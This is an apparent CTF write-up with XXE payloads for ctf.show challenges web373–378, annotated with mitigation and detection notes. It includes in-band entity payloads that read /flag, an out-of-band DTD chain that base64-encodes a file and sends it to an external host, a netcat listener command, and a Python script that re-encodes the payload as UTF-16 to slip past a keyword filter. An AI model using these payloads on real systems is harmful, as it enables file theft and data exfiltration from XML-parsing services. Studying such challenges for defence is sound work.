web373
payload
<!--
  In-band XXE test document for the web373 challenge.
  The internal DTD subset declares a general entity "xxe" whose system
  identifier is a local file URI, and the document body references it.
  The file content only comes back if the parser substitutes external
  entities AND the application returns the parsed element to the client
  (presumably the <ctfshow> element here; the server code is not shown on
  this page, confirm).
  Mitigation: parse untrusted XML with DTD loading and entity substitution
  turned off; for PHP/libxml that means not passing LIBXML_NOENT or
  LIBXML_DTDLOAD to the loader.
-->
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>
web374、375、376
payload
<!--
  Out-of-band (blind) XXE test document for web374, 375 and 376.
  Nothing is referenced in the document body (<root> holds a constant), so
  the result is not expected in the HTTP response.
  "xxx" is the page's placeholder for the external host.
  Defender notes: this relies on the parser being allowed to fetch an
  external DTD over HTTP. Disabling external DTD/entity loading in the
  parser and restricting outbound connections from the application host
  both break the chain, and an XML-parsing service that makes an outbound
  HTTP request right after receiving a DOCTYPE is a usable detection signal.
-->
<!DOCTYPE test [
<!-- Parameter entity: file content read through PHP's php://filter stream
     wrapper and base64-encoded (presumably so it survives inside a URL). -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!-- Parameter entity pointing at a remotely hosted DTD (test.dtd on this page). -->
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
<!-- Referencing %aaa; makes the parser fetch and process that external DTD. -->
%aaa;
]>
<root>123</root>
test.dtd
<!--
  External DTD fetched by the %aaa; reference in the document above.
  It declares a parameter entity "dtd" whose replacement text is itself an
  entity declaration ("xxe") with %file; embedded in its system identifier;
  expanding %dtd; and then %xxe; makes the parser request that URL.
  Defender notes: the observable is an outbound HTTP request from the
  application host to an unfamiliar host and port (9999 on this page) with a
  long base64-looking path. Egress filtering on the XML-processing tier and
  disabling external entity resolution in the parser stop it.
-->
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://xxx:9999/%file;'> ">
%dtd;
%xxe;
在服务器上开启监听：nc -lvp 9999
web377
payload
import requests
# Target: a per-instance ctf.show challenge endpoint.
url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
# Request body: the same internal-subset DTD shown in the web374/375/376
# section of this page ("xxx" is the page's placeholder for the external host).
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>123</root>"""
# Re-encode the body as UTF-16 (Python's 'utf-16' codec prepends a BOM).
# NOTE(review): presumably web377 adds a keyword filter on the raw request
# bytes while the XML parser still honours the declared/BOM encoding; the
# server code is not shown on this page, confirm.
# Defender takeaway: matching keywords in the raw body is not a control for
# XXE, because the parser decodes the document before interpreting it. Disable
# DTD loading and external entity resolution in the parser instead.
payload = payload.encode('utf-16')
# The response is discarded: the page expects the result on a separate
# listener, not in the HTTP reply. No timeout is set on the request.
requests.post(url ,data=payload)
开监听拿flag
web378
<!--
  In-band XXE test document for web378: the same general-entity declaration
  as the web373 case, placed in a <user>/<username>/<password> document.
  NOTE(review): presumably the endpoint is a login handler that reflects one
  of these fields in its response; the server code is not shown on this page,
  confirm.
  Mitigation is unchanged: parse request bodies with DTD processing and
  external entity substitution disabled, and avoid echoing parsed input
  verbatim in error or status messages.
-->
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>